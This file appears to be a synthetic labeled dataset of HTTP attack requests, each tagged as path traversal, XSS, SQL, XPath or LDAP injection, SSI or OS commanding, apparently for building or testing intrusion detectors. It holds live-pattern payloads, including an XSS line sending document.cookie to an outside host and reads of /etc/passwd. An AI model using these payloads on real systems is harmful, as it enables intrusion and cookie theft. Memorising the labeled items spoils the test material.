GET /lienrrhaKfnhz6clqoA/n6ayLrbie7rurmn/XL9-n/dox1nrneHorlbgsiee/tOMc0hEL/H98Pinsert-alogP-/ttk9ea/tII6I@b6zAuBzXX/suufB2H.u@5/efc/teni18.shtml?gut9LzsOnnetv7=wa9laTe+2&5Srxnne=520169&aeshKade=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Fyo.bat&A89y52IN3rQ=531848986&L5EWh1Fvo=573921551&WWWlKz58V_passthru=copyvh&7WCDz=4lUbcBhoesbaa&Irgehi=echoesock_stream+ayvqu&ls4airIdrs=71&t3ksd5dsiAjv9dt=+v HTTP/1.0
Host: www.renSsTzsai.ch
Connection: eirePL
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.0
Accept-Language: gRnhi3aR-9E;q=0.9, e-oj, asqd-cfict3, Rgaih-ee, d-rayvEbAr;q=0.7
Cache-Control: max-age=11286
Client-ip: 180.199.9.54
Cookie: ai1eya9E3=74546;ndhc=19437879;itEinsl0El=systemoselecthal=aInbncn\e ;qchnnhin=g52tneiieae;eei=9;l6=ndncddtdgtxyu
Cookie2: $Version="4"
Date: Sun, 30 Jan 05 04:35:36 GMT
ETag: "tJMxSUmbHfv8AsK3jw"
Expect: 100-continue
From: dzgo@mzeta.ch
If-Modified-Since: Thu, 27 Mar 08 18:49:54 CET
If-Unmodified-Since: Sun, 06 Sep 09 14:14:43 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: Digest realm
Range: 9844-66,0-,-297
Referer: /rhre/0eaw.pdf
TE: chunked
Trailer: Max-Forwards
User-Agent: Mozilla/0.4 (Windows; U; Win 9x 7.8; En-6w; rv:2.8.7) Gecko/65335630
UA-CPU: MIPS
UA-Disp: 0150,960,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 7606x3250
Via: 4.3 www.nhwhomS5.gif, 4.8 www.eienh.js
Transfer-Encoding: gzip
Upgrade: eniw/0.3, sum/7.6, tRyoa/3.2, eolses/1.6
Warning: 643 99.90.218.216 "i6te3torsbteItixa4tu" 
X-Forwarded-For: 77.201.61.163
X-Serial-Number: 7294579742813634
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36116
Start - Id: 45534
class: PathTransversal
GET /aansVda1/oKtkXMTzWT.asmx?ebptalcj=tbidAlsrqaccepts&esodyaces=..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini HTTP/1.0
Host: 49.87.42.234
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: utf-7
Accept-Encoding: deflate, deflate;q=0.8, compress, deflate, deflate
Accept-Language: rtecrSo3-g, i-kyeee
Cache-Control: 9sHfarH=5ogv
Client-ip: 66.66.212.231
Cookie: nbHn=wqe;YYzyuou_tPpf=cwbuse;Rk2deletestyleE0c7Jkf= leg
Cookie2: $Version="20"
Date: Tue, 10 Mar 09 12:46:38 UTC
ETag: "Ze@vy62aYSghPKIo"
Expect: ax8lncn
From: muibee@Egtuem.uk
If-Modified-Since: Thu, 11 Feb 10 10:30:28 UTC
If-Unmodified-Since: Sat, 22 Jan 05 05:09:12 GMT
If-Match: "IC-UjTh@w4IWc0m"
If-None-Match: "vWoOO@C-PaR2Ea0G.5A"
If-Range: "NobdZfNtglYhDQNP"
Max-Forwards: 989
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: enba eOsywabt=bulrtl
Authorization: Basic ZW5wSDp0c2hh
Range: 903-3,3-4324,-8
Referer: http://taIfu3i.gov/ttgg/smFottot/AanMd.msf
TE: trailers
Trailer: Accept
User-Agent: aelaee8Ee/5.3
UA-CPU: 68000
UA-Disp: 6548,353,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 589x0586
Via: 3.6 187.66.182.212
Transfer-Encoding: sh3Lsd
Upgrade: vleih/1.8, zzq/8.8, etwstn/4.5, eseo/9.8, ilezr/6.6
Warning: 706 www.0ndytwes.html:36947 "eAwteosqooe7" 
X-Forwarded-For: 167.86.117.234
X-Serial-Number: 2215888867609
----: ------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 45534
Start - Id: 44688
class: PathTransversal
PUT /bJdQ2/oHG6R/ylbb4ieDaeeet/IMIMIIxvobjectN.jpeg? HTTP/1.0
Content-Length: 182
Content-Language: ieod
Content-Encoding: deflate
Content-Location: /ef1Fd/tzssesoh.ace
Content-MD5: aXF0bnAzbmFlVDNlRWJScg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 12 Jan 10 24:29:54 GMT
Last-Modified: Fri, 08 Dec 06 03:25:33 CET
Host: www.do3ele.cz
Connection: imtoN
Accept: video/quicktime;q=0.3
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.8
Accept-Language: qEoMji-sesEb;q=0.4, ctl-nae, D-78nldne, tnr8eaa-aun
Cache-Control: min-fresh=3027
Client-ip: 113.128.122.99
Cookie: bmglfmUhnlI=erDD3;hitcsAwRhye=Dtn4j fg;wzisati73p4gsr=38231755
Cookie2: $Version="657"
Date: Sat, 19 Nov 05 17:47:08 CET
ETag: "KMnuhyHCL6pclcSzCXiL"
Expect: 100-continue
From: nC0otao@cuVsd.gov
If-Modified-Since: Wed, 02 Jan 08 01:23:29 CET
If-Unmodified-Since: Mon, 12 Apr 10 01:01:59 UTC
If-Match: *
If-None-Match: "dr7q60SUwfpocpkYSr6"
If-Range: *
Max-Forwards: 4
Pragma: no-cache
Authorization: Digest nc=F2bf69C0
Range: 2168-,8-1607,73-
Referer: http://www.elemn.cz/rhCe5J3M/AiorI1/ht8Oett/tuienm/mlUDmel.jsp
TE: trailers,gzip,deflate
Trailer: Cache-Control
User-Agent: Mozilla/0.1 (X11; U; Solaris 6.6; bo-wA; rv:1.9.8) Gecko/81573008
UA-CPU: StrongARM
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 562x3540
Via: hanpe/3.4 www.nFerirey.html, Ahi/0.3 231.207.250.1
Transfer-Encoding: compress
Upgrade: 2dgtes/0.6
Warning: 868 www.gmor.js "Hn5xrhit" 
X-Forwarded-For: 121.97.240.234
X-Serial-Number: 175251
----: ------------------------

pnr=doc(     file:///c:/di/tSecdydh.xml   )&WBKqVmIH=st3oneqmoh&gbFlygmetaP-Rb=74179748&st=dFN&IelEi=Itwldfi07os&geetsuNsR=8903&eionld3eutcL1aj=1065414&tcaeh=nNeSie

End - Id: 44688
Start - Id: 47188
class: XSS
GET /3evR8f9vXraMQFJph-sB/e@O7BdnSOavCp@L3c/2see2I/tka/ifJBL0C/hWeAYZr9Z6/qel/ngbrn9/3U1Ey1L2-servicesK/mnkEFX.cfm?Amaaisjsrzonm2e=s%25&yrnOrRiergheg=%3Cimg++src%3D++%22++mocha%3A%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.stetarel.com%2Fcgi-bin%2Fgeteorliie.cgi%27%2Bdocument.cookie%29%3B%5D+++++%22+%3E&leo=ea+ibetweennayt%2FeDmeirTexml&cai1erruna4oea=ecsnfo2n%27vpet HTTP/1.1
Host: www.9gaeolfsr.de:80
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: e='s'
Client-ip: 193.55.166.33
Cookie: 5noasanKstelR=402595272;akh=ep:ndEoinji
Cookie2: $Version="81"
Date: Mon, 12 Jan 09 03:07:34 UTC
ETag: W/"bo.SFw@Le2qxDYl"
Expect: 100-continue
From: oeDi@asaha.net
If-Modified-Since: Fri, 12 Jan 07 01:37:52 GMT
If-Unmodified-Since: Fri, 16 Feb 07 05:17:21 UTC
If-Match: "4D@_eka8sw_eHRUP"
If-None-Match: *
If-Range: *
Max-Forwards: 146
MIME-Version: 3.0
Pragma: uva='di'
Proxy-Authorization: n0ntl bt2Ndpz=9yldlwu
Authorization: Digest response="B7e9cCEafc2ee981F7b29FDEC2eFF6Ee"
Range: 671-463
Referer: http://www.b5eEe.org/ebhtiena/eiemi/iatre.jpeg
TE: trailers,trailers,deflate;q=0.3
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.4 (X11; U; Open BSD i586 7.7; tm-eu; rv:4.0.3) Gecko/49589734
UA-CPU: 68000
UA-Disp: 934,693,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 739x565
Via: tw9f/9.3 6.85.199.44:3144
Transfer-Encoding: identity
Upgrade: 7hadcl/7.9, 8tJSt/5.4, qlttea/4.8
Warning: 683 181.248.214.19 "qlt9unMovxwdh" "Tue, 18 Jan 05 01:02:04 UTC"
X-Forwarded-For: 25.149.50.16
X-Serial-Number: 533969856895
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47188
Start - Id: 42682
class: SqlInjection
GET /xY-/tdaeecano/selecttmplikeFfg5VWboot.iniw3/nC9/z6dPj_Os2XzWM-2/Ad5D/nmLnpferye/9M0nv76k3cy5l8FcYGrI/qary/eZcDWGIInURH..K/s0dStn2rusnat/rw6@qlz8inmcvtlZ6@.php3?Sld7i=hni8&rWA.x2@null3AYq=8nhhtpassd&neT=ccigoptOtmpnz&soe7xe=97841&eis=enm2N&mnamkrs=ri0afahgn11t&_telnetLcmdZVSHJkxtermB=%27++++union+select+%40%40version%2C1%2C1%2C1--&65ao=ttmnoxymoaht6ytwsb HTTP/1.1
Host: 153.135.239.100:86
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: seprngop-dl2j9xtj;q=0.6
Cache-Control: no-store
Client-ip: 219.244.18.221
Cookie: osaehgdRiRbb3hs=cfrlwapele0s7l;lJsssvio=waM;UNLDaFaX4=$etctN0t;GvISb=ekrnrfdmetateth;sx9uaetkl=z qrn1b9a|n';e7fromLcdy;cviclhy9a=719696850
Date: Wed, 24 Nov 04 01:15:33 UTC
ETag: "xm_kl@DG33VU5oJ"
Expect: 100-continue
From: keNoy@ouhsnitwek.de
If-Modified-Since: Sun, 18 Apr 10 09:38:13 UTC
If-Unmodified-Since: Thu, 25 Nov 04 21:11:09 GMT
If-Match: "Cgq-mthr4eBGYlXwdr"
If-None-Match: *
If-Range: *
Max-Forwards: 23
Pragma: aal1i=b7k4n
Proxy-Authorization: NTLM d295OG9zZjBvOHZpb2w0YWRvcmVpcTgyYXNubmFJaGFUZU5iZW8=
Authorization: Basic dGhlc0F1dzpsYXdvYQ==
Range: 498-
Referer: http://tss1tRo.net/iaoha/Pireisi.cfm
TE: chunked;q=0.2
User-Agent: zakn3/7.2.6.6
UA-CPU: MIPS
UA-OS: WinNT
Transfer-Encoding: identity
Upgrade: imz/3.7, oos/0.1
Warning: 242 www.sWaoih.gif "xAMmro5wa" "Tue, 30 Sep 08 13:51:05 CET"
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42682
Start - Id: 35798
class: XPathInjection
GET /s91SekLKWmL_k0Q@J/xRVQF2/mjHNxp_/aXI@N/odtO@u/ibijnr2f7vwRvfaR-9J2/22--o1m_4SymCc/Xhtpass_STdeleteI.eN/LPh@/shAOnae8he/tetjat7CCs1rrS/2faccepty.e.tiff?eoenitucn=fe+9ei&fc1tlcoErLe=Eeemq%27++++or+++%28i++++%3C+count%28e1yt%2Fchild%3A%3Atext%28%29%29+++++and+++j++++%3C++count%28prrDmD%2Fchild%3A%3Acomment%28%29%29++++and++k+++++%3C++count%28aepatE%2Fchild%3A%3A*%29+++%29+or++%27mssswe%27++++%3D++%27+++++ple%27+++or&ocNmaojr4ou=poet&75wtr=fexec8cnxlqteer%40t&iEesosodtna6aAe=640464&e3iPdttfge9i=vslirnbtyehspesrzL&msfhsng=1cs%7Ct%2B%26Tc+th1&huTdnstTid3=fS8DOH HTTP/1.1
Host: 144.117.205.56
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: Ewq-T, bow-ng;q=0.4, yaMIt-ih;q=0.0, ee0nf-sfsl;q=0.2
Cache-Control: max-age=17533
Client-ip: 111.27.1.64
Cookie: 4ZaaQ=33577516;uellh=Ie~
Cookie2: $Version="55"
Date: Sun, 19 Oct 08 07:05:34 CET
ETag: W/"G32zz.S_bM61Knda"
Expect: 37tora
From: eseIouno@dgr3a.gov
If-Modified-Since: Fri, 18 Feb 05 06:02:57 GMT
If-Unmodified-Since: Sun, 08 Jan 06 10:17:12 UTC
If-Match: *
If-None-Match: *
If-Range: "SxD.GKZF1KXk6prSn"
Max-Forwards: 1
MIME-Version: 7.5
Pragma: io3mm3dt='Urr'
Proxy-Authorization: luLc Okt8e=3llo
Authorization: Digest opaque="rt7ngt"
Referer: /Kizm/udmsuA/agcU7a.fgf
TE: trailers,trailers
Trailer: Expect
User-Agent: ettudTie (oWxKznhk; wVSVDOcj; owfFHJ)
UA-OS: WinNT
UA-Pixels: 4135x5853
Via: 1bNUer/1.3 245.161.192.158, 8.2 www.dolma.gif, ual/3.0 6.114.3.31
Transfer-Encoding: deflate
Upgrade: n2smtz/0.7
Warning: 463 52.135.104.34 "le3vso" 
X-Forwarded-For: 240.46.36.222
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35798
Start - Id: 39247
class: SSI
GET /YX/GYinEwOadeleteKkMbin5/yw59G/i.UCb7pME0jAMxNd-/a-oe9/edpfomberRoszAf/tcwMtjrT9/p49jrQ/mhZSBHLkF/cwhKdhH2wd.cgi?ihhkt0nlshw8je=2&duid=%3C%21--%23email+fromhost%3D%22www.mtfgAhe.com%22+tohost%3D%22mailbox.orou.com%22+message%3D%22AnLemj+enoa3t+ta+la8yYb%22+fromaddress%3D%222anmW.com%22+toaddress%3D%22nsnXn.ho.com%22+subject%3D%22oSh%22+sender%3D%22ltLe.com%22+replyto%3D%22ralnp.com%22+cc%3D%22Enwb%22+inreplyto%3D%22eeade+aten+n%22+id%3D%22eNiqlmail%22+--%3E&eYSxhVZ=008442388&9vf6txqehdT=4&l2ysgshkbnpn0=2&tam9bebsm=suHnundwp-en2u+4&qARH=oq0areplacesisq%25imgLavaccess_logoe HTTP/1.1
Host: www.nahgbniris.st
Connection: close
Accept: text/*;q=0.4
Accept-Charset: iso-8859-3, iso-8859-9, utf-7;q=0.0, iso-8859-7;q=0.4, iso-8859-9
Accept-Encoding: compress;q=0.4
Accept-Language: o-E;q=0.8, 7fsnmrad-t6io;q=0.5, HyaNTn-ouva, md-d;q=0.9, dso-h9s;q=0.1
Cache-Control: no-transform
Client-ip: 240.199.60.134
Cookie: auebhRA4mink=616884075;nezeiontcr0noi=2329257640
Cookie2: $Version="7"
Date: Mon, 10 Nov 08 18:10:44 GMT
ETag: "0BHUHKmivEf04-jY"
Expect: 100-continue
From: ogpe@eKhmc.uk
If-Modified-Since: Mon, 26 Jan 04 07:34:01 UTC
If-Unmodified-Since: Mon, 12 Jun 06 09:09:42 CET
If-Match: *
If-None-Match: "6k9onyt6SyILE@.@3"
If-Range: "QEelm2mgLh-UbRfP0"
Max-Forwards: 04
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic bFN4ZG5mOjZyZVlhZQ==
Authorization: NTLM c250cnlGYWlvdVJaZ0VxdHM4Tm9yZnJ0ZDBoZm9sdGVm
Range: 5-9725,-6683
Referer: /nhiojSs/feln/iiipz/attai/Cowe.msf
TE: deflate,trailers,gzip;q=0.7
Trailer: Range
User-Agent: Mozilla/5.6 (Windows; U; WinNT 0.0; Re-Oh; rv:4.8.7) Gecko/55211568
UA-CPU: MIPS
UA-Disp: 979,109,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 833x510
Via: FTP/8.2 69.159.239.55
Transfer-Encoding: deflate
Upgrade: ueiyd/3.1, tac/2.4, eiz/0.3, isofl/2.9, eutR/4.6
Warning: 674 87.251.118.45 "eumooyaaYheigmldr" 
X-Forwarded-For: 252.9.253.184
X-Serial-Number: 2940498240401251
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39247
Start - Id: 45243
class: PathTransversal
GET .////////////////////////? HTTP/1.1
Host: 220.231.109.241:94
Connection: close
Accept: audio/*;q=0.5, video/mpeg;q=0.6, video/*;q=0.2
Accept-Charset: gb2312, euc-cn, koi8-r;q=0.6
Accept-Encoding: *;q=0.8
Accept-Language: dnqr8te-Tf;q=0.0
Cache-Control: only-if-cached
Client-ip: 172.49.251.232
Cookie: yzd6htleadap=3
Cookie2: $Version="453"
Date: Sun, 04 Apr 10 14:18:02 GMT
ETag: W/"TC1C.R6SZLoWaRYE"
Expect: 100-continue
From: nr1cs36r@ar1hsxlt.org
If-Modified-Since: Mon, 26 Apr 10 02:37:03 UTC
If-Unmodified-Since: Mon, 01 May 06 14:35:36 UTC
If-Match: *
If-None-Match: "ZeUMHVkrw.uVUbox3"
If-Range: Thu, 26 Feb 09 18:52:01 CET
Max-Forwards: 6114
MIME-Version: 1.7
Pragma: 6o2iTn='e7h'
Proxy-Authorization: Digest qop=evai40
Authorization: sp25il SUuE=4iuouhb
Range: 220-5761,42620-
Referer: /nentid.bin
TE: chunked;q=0.3,trailers
Trailer: Expect
User-Agent: eoryse/0.3.1.9.8
UA-CPU: x86
UA-Disp: 568,3282,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2272x045
Via: nneodo/9.9 www.8ar3eob.jpg:0444, wreTl/9.0 111.212.219.44:0, 7.6 212.203.15.0
Transfer-Encoding: compress
Upgrade: ttt5/9.0, laolhr/8.9, geei2/4.3
Warning: 831 www.rueghla.htm "ecA7eejeodtti" 
X-Forwarded-For: 42.110.150.96
X-Serial-Number: 67855229
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45243
Start - Id: 36354
class: PathTransversal
GET /gxSEUFL3uIfmVAWals/ezYIDc/.AiL130/atMp1o2O/PYnph-WlUxltelnet/ttShssnA5p/nOto/ySr/rfs.gif?yrtn2=m2a&b7ersAAloctvai=%2Fetc%2Fpasswd&asno8sh=%7E%3Ei4d1mz8prwlT HTTP/1.0
Host: www.piAtoxlo.st
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 102.199.117.40
Cookie: hlOtpsaewh7re57=1299271;gWmhUg=242398838;l8e9tehhiyhie=i~hsopt[a0d|ev;dFEQLlLAMk=ebtSntrq;1Z5Sncx23VeQ@=er+;lhqiGTh1r=r%8)ies
Cookie2: $Version="14"
Date: Fri, 28 May 04 10:53:07 UTC
ETag: "9R0VecNaYF8anlD5"
Expect: 100-continue
From: sotSFlSe@qiksat.biz
If-Modified-Since: Wed, 19 Mar 08 14:19:50 CET
If-Unmodified-Since: Sun, 04 Jul 04 06:26:59 UTC
If-Match: "ZZKNmk7E5@hKVdxm"
If-None-Match: *
If-Range: "JipMFmiMMaLo9Elqk"
Max-Forwards: 7117
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: Basic YXVJbnM6ZWhpcjFndHU=
Authorization: Basic endlaG9vOm94ZWNtaWg=
Range: 75-618834,757-411,77394-267269
Referer: /btjh/6coat.tiff
TE: trailers,trailers
Trailer: From
User-Agent: Mozilla/4.1 (compatible; MSIE 0.4; Linux i386; et4voF)
UA-CPU: MIPS
UA-Disp: 7628,9010,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 636x8824
Via: HTTP/9.8 www.xjod6ef5.gif:0461
Transfer-Encoding: deflate
Upgrade: T8m/5.2, fg1ie/5.0, hrhh/0.4
Warning: 001 www.wnfwiw.shtml:74 "pandndeithrmamit" 
X-Forwarded-For: 217.52.49.74
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36354
Start - Id: 37375
class: LdapInjection
GET /nEbeXS8hHOXUDEa/e.wGW8dYr/aSz1m/sByL8.Z_159od/pD/kyKZUieiGfJXNA-.jpg?OpacceptkCv__fzzfrom=iotn&h3Fgtygsl=49279 HTTP/1.1
Host: www.dyg9.cz
Connection: eont
Accept: */*
Accept-Charset: macintosh;q=0.5, x-mac-arabic, iso-8859-6, x-mac-cyrillic, iso-8859-7;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 216.28.135.192
Cookie: ee=the3tcexyoa2Ihd;7Ri=yreaho;exec0pI=xp_e0;tinhe8necFptw=tlhtacces;itg0g=bn
Cookie2: $Version="3"
Date: Fri, 14 Dec 07 17:59:29 CET
ETag: W/"bOEchXxGnJ.dWKbra"
Expect: 8eyniOa
From: sm6g0Ann@iaqhc.it
If-Modified-Since: Sat, 25 Dec 04 08:07:23 UTC
If-Unmodified-Since: Tue, 15 Mar 05 18:50:20 GMT
If-Match: "nqOK0UBXOy6iL5kF"
If-None-Match: *
If-Range: Wed, 11 Jul 07 13:34:19 UTC
Max-Forwards: 942
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest username="bu7etgel"
Authorization: Basic Ym5tZ2lwYTo1c2xybnNl
Range: -112070,72375-
Referer: http://www.aayReoxp.ch/Ete13nce/eno7aewo/3tip/xeseve.jpg
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: ")(targetfilter=(o=NetscapeRoot))
UA-CPU: x86
UA-OS: Win95
Via: 2.6 www.adezenuh.html
Transfer-Encoding: identity
Upgrade: 2B6/2.2
Warning: 419 www.jDerg.tiff "fugwm5eoioziV5wll" 
X-Forwarded-For: 170.106.4.226
X-Serial-Number: 074489
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 37375
Start - Id: 35625
class: XPathInjection
GET /shb3ioxtseecr61inag2/n4ypgeru0otnhoAdrarY/d8wrtMm1o/eobjectW/zOL6grIXSI7SIOLCtW/cnrtuzluev/rAYQd.3Uvw/lu5ttoerjaoEzaR/pge/u8GGNvlOLF/oZcopy.shtml?@IFJ=eriwst%2FYdhr0%2Fa%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D158%5D+or+%27a5c%27+++%3D%27 HTTP/1.0
Host: www.eercc9n.cz
Connection: keep-alive
Accept: text/xml;q=0.5, video/mpeg;q=0.9, text/*
Accept-Charset: *
Accept-Encoding: identity, compress, compress, identity;q=0.0
Accept-Language: *
Cache-Control: max-stale
Client-ip: 254.148.190.50
Cookie: B9eiFyutj=oe/d+j2eey1trI 
Cookie2: $Version="6"
Date: Wed, 22 Nov 06 01:18:56 GMT
ETag: W/"RHGnr5mtJSo7iZ9Y"
Expect: arecso=imaEbd
From: yehNodot@eblEqjJp.ch
If-Modified-Since: Sun, 02 Jul 06 22:53:33 CET
If-Unmodified-Since: Thu, 24 Jan 08 02:35:59 UTC
If-Match: "U-Ntndda.Irh0gL90"
If-None-Match: *
If-Range: "z285ETIARPyp0Sb0Hn.t"
Max-Forwards: 8
MIME-Version: 3.8
Pragma: 1de='dfdiag'
Proxy-Authorization: Digest nc=0944EBDa
Authorization: NTLM ZU9nYm9zdGUwdU1ib2VldG1yb2RpaWRkQ2RnZGxyTGlmdHJOQmFzdG50
Range: 7528-,849-
Referer: /rEu7cni/aarAiA/5aa9Ue5i/hnirn.php3
TE: trailers,chunked;q=0.6,trailers
Trailer: Host
User-Agent: Mozilla/6.7 (Windows; U; Win 9x 7.9; op-ms; rv:8.4.4) Gecko/05748194
UA-CPU: Sparc
UA-Disp: 458,730,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 817x128
Via: 7.4 4.92.172.173:6109
Transfer-Encoding: cpOn
Upgrade: sivn/3.0
Warning: 986 www.rBnsrcl.html "5cdarlosaE" 
X-Forwarded-For: 95.188.1.103
X-Serial-Number: 65275952070459353
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35625
Start - Id: 36748
class: OsCommanding
GET /4JdeleteNYlc5IaVWOX/rROMm4R4axbC6nvTAW/scKlnPgJh8/es6v-xLm_/eerg.tiff?nahay5edHt=357&nDUflilpe9=%2Fperl++++%2Ftmp%2Fsitrve.pl+++++-p8228&mC=67533479&umclAiitwczi=%28sn1hnodemt&nTsndn1=ltEr%2Fdxztvbscript8h&ygboQnieele=52316&arnatoroN=69475464&oqleDhopti=lashutdown&slrcazl=rywf7m%2B3g%2Fu%3Elwj HTTP/1.0
Host: 159.182.207.70:03022
Connection: keep-alive
Accept: audio/*;q=0.2, text/xml
Accept-Charset: cp-932;q=0.0, macintosh, utf-8, iso-8859-4;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 66.186.73.243
Cookie: etdrezmAa=stS>4t8?=todNdte;tu1ir6fs2=o9HvcfQh
Cookie2: $Version="34"
Date: Thu, 09 Mar 06 19:52:58 GMT
ETag: "OSxgv6GwIp@.QEtxE"
Expect: iuowlu=arrod;at3irEyt=cnoiy
From: 9rrtotci@rtshul.org
If-Modified-Since: Fri, 12 Nov 04 21:54:38 CET
If-Unmodified-Since: Mon, 12 Oct 09 17:28:32 UTC
If-Match: *
If-None-Match: "whlAbR@ZXAo_LZWA79"
If-Range: Sat, 03 Apr 10 16:44:27 GMT
Max-Forwards: 2722
MIME-Version: 5.1
Pragma: ov5mzs='hhrnlA'
Proxy-Authorization: ttsg7i nehfeHuT=4aeyn
Authorization: NTLM anpOaW5paGdldGVKdW44bHNzdGViYWFudXVhTmJPcnJheWVxOWU=
Range: 50-7
Referer: http://buti.cz/dRE9aN/aoti.jsp
TE: deflate;q=0.3,gzip,trailers
Trailer: From
User-Agent: 7giib/0.0
UA-CPU: x86
UA-Disp: 944,674,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 232x1783
Via: aetiT/9.5 www.mPieot.html, 7.4 84.118.18.122
Transfer-Encoding: identity
Upgrade: qpu/3.7
Warning: 603 www.nelar.css "fseup" "Fri, 11 Nov 05 23:14:00 GMT"
X-Forwarded-For: 128.194.144.121
X-Serial-Number: 51873709956197
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36748
Start - Id: 39260
class: SSI
GET /dGaVi0iWLF3Xc61BAy.msf?efCxonj9=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&hobaIl=5897875&hqihuto=eacceptaccept&D8c3ieaWtOO=yFW-DzND&aeaBlewoU=fEVb-o&so0qi=frnen HTTP/1.0
Host: www.seouson.com
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: max-age=87
Client-ip: 120.3.200.190
Cookie: depasewniovkl=53;eecdonlirc=wxi-nYax1;dsnEsg6lbi779o=0080381
Cookie2: $Version="81"
Date: Sat, 17 Nov 07 20:39:21 GMT
ETag: "I6x001IZy.Iz5lBYh"
Expect: 100-continue
From: ogpe@eKhmc.uk
If-Modified-Since: Fri, 09 Dec 05 02:21:53 GMT
If-Unmodified-Since: Tue, 17 Jan 06 08:13:33 GMT
If-Match: "BGkEmln_lbfTLGB"
If-None-Match: *
If-Range: Wed, 14 Feb 07 02:24:12 CET
Max-Forwards: 233
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: NTLM dGs2bnNEZXBhN2h0dG5ldlFCbnlkQXN0c25tcmFrb1B0YXVzbXlJbm9paFBsaTE=
Authorization: tuA4c nrgp=nrrh
Range: 6-,-42,-764390
Referer: /nucee/eret/nGpilin/aMit.js
TE: gzip,trailers
Trailer: If-Range
User-Agent: cgPnDuHB http://www.biou8te.gov
UA-CPU: MIPS
UA-Disp: 3603,824,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 272x2054
Via: HTTP/7.3 32.210.60.18
Transfer-Encoding: gzip
Upgrade: 8gtyn/7.7, ttdrko/9.1, 7yofs/9.0
Warning: 287 126.35.36.107 "nswieognJ8y6pns" "Thu, 06 Oct 05 08:40:40 UTC"
X-Forwarded-For: 237.101.171.41
X-Serial-Number: 2940498240401251
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39260
Start - Id: 38082
class: LdapInjection
GET /s6nkica/optOe2t/NISh1XformkYo/8QigLoorbey5haoeecr1/y-y3/unnahgEF/0lltfeeeenilheTi/dun4em9es0rgcs9uOyIt/en4fddoiE5h/5eHYnd.tiff?6l=tigvs%29%28%26%28objectClass++%3D+u43*%29&rsabs=owBUVpMuK5Yy HTTP/1.0
Host: www.uwhr9s.cz
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.5
Accept-Encoding: deflate;q=0.4, gzip;q=0.6
Accept-Language: psuir-t6yogmv, eay-ll;q=0.7
Cache-Control: min-fresh=0
Client-ip: 111.152.191.252
Cookie: hgg=aaiUu;decho;xuaeosxisfuhO=4pieoneo;7gricLasaytteu=oxesr7ihaanaanmD5;d8aigye5ia2soe=held
Cookie2: $Version="74"
Date: Thu, 05 Apr 07 03:53:04 GMT
ETag: "YkHJ90Q21HYAPiC1"
Expect: 100-continue
From: 6boleoo@ai5nodlHti.be
If-Modified-Since: Wed, 05 Oct 05 16:11:34 CET
If-Unmodified-Since: Sat, 01 Jan 05 16:35:02 UTC
If-Match: "Sn-9kPrFEhp0MAP4Jg9"
If-None-Match: "NtTBkiQr7.qr_qJGPp"
If-Range: "WgFAGtq-T.atbi6qVwQg"
Max-Forwards: 63
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Basic V3I2dGV5dzppZXR0ZW5pYw==
